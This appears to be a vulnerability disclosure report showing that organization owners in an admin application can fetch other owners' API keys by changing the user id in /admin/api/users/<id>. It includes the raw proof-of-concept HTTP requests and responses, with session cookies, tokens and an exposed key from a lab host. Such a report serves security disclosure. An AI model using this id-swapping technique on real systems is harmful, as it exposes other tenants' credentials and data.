Organization owners can view the generated API KEY and USERS of other Organization Owners using the http://192.168.26.128:8080/admin/api/users/<user_id> endpoint which expose the details of the provided user id.
The API KEY is showing in the username of the user.
GET /admin/api/users/12 HTTP/1.1
Host: 192.168.26.128:8080
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36
X-XSRF-TOKEN: 1e9c573e-8f7f-4a14-aa1a-e411f6911626
Referer: http://192.168.26.128:8080/admin
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: SESSION=b1a585a8-7e9d-4e86-89ee-6e36c554a048; XSRF-TOKEN=1e9c573e-8f7f-4a14-aa1a-e411f6911626
Connection: close
HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Apr 2023 15:15:01 GMT
Set-Cookie: XSRF-TOKEN=1e9c573e-8f7f-4a14-aa1a-e411f6911626; Path=/
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/json;charset=utf-8
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Vary: Accept-Encoding, User-Agent
{"id":12,"organizationId":2,"role":"SUPERVISOR","username":"6b625cf8-90ef-430b-a3f5-fb37d3cf72d0","firstName":"apikey","lastName":"","emailAddress":"","type":"API_KEY","validTo":null,"description":"This is ORG1 API KEY For Check-In Supervisor","validToAsDateTime":null}
GET /admin/api/users/12 HTTP/1.1
Host: 192.168.26.128:8080
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36
Referer: http://192.168.26.128:8080/admin
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
X-XSRF-TOKEN: 42200ced-bf1e-4287-b031-a0f09131fc23
X-CSRF-TOKEN: 42200ced-bf1e-4287-b031-a0f09131fc23
Cookie: XSRF-TOKEN=42200ced-bf1e-4287-b031-a0f09131fc23; SESSION=b1a585a8-7e9d-4e86-89ee-6e36c554a048
HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Apr 2023 15:15:01 GMT
Set-Cookie: XSRF-TOKEN=1e9c573e-8f7f-4a14-aa1a-e411f6911626; Path=/
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/json;charset=utf-8
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Vary: Accept-Encoding, User-Agent
{"id":12,"organizationId":2,"role":"SUPERVISOR","username":"6b625cf8-90ef-430b-a3f5-fb37d3cf72d0","firstName":"apikey","lastName":"","emailAddress":"","type":"API_KEY","validTo":null,"description":"This is ORG1 API KEY For Check-In Supervisor","validToAsDateTime":null}
Organization owners can get the API KEY of other organization owners and use it to access/edit data.
rac-fckscty Reporter
Description
Organization owners can view the generated API KEY and USERS of other Organization Owners using the
http://192.168.26.128:8080/admin/api/users/<user_id>endpoint which expose the details of the provided user id.The API KEY is showing in the username of the user.
Proof of Concept
Original Request of OrgOwner 1
Original Response from OrgOwner1's request
Modified Request from OrgOwner2
Response from OrgOwner2's request
Impact
Organization owners can get the API KEY of other organization owners and use it to access/edit data.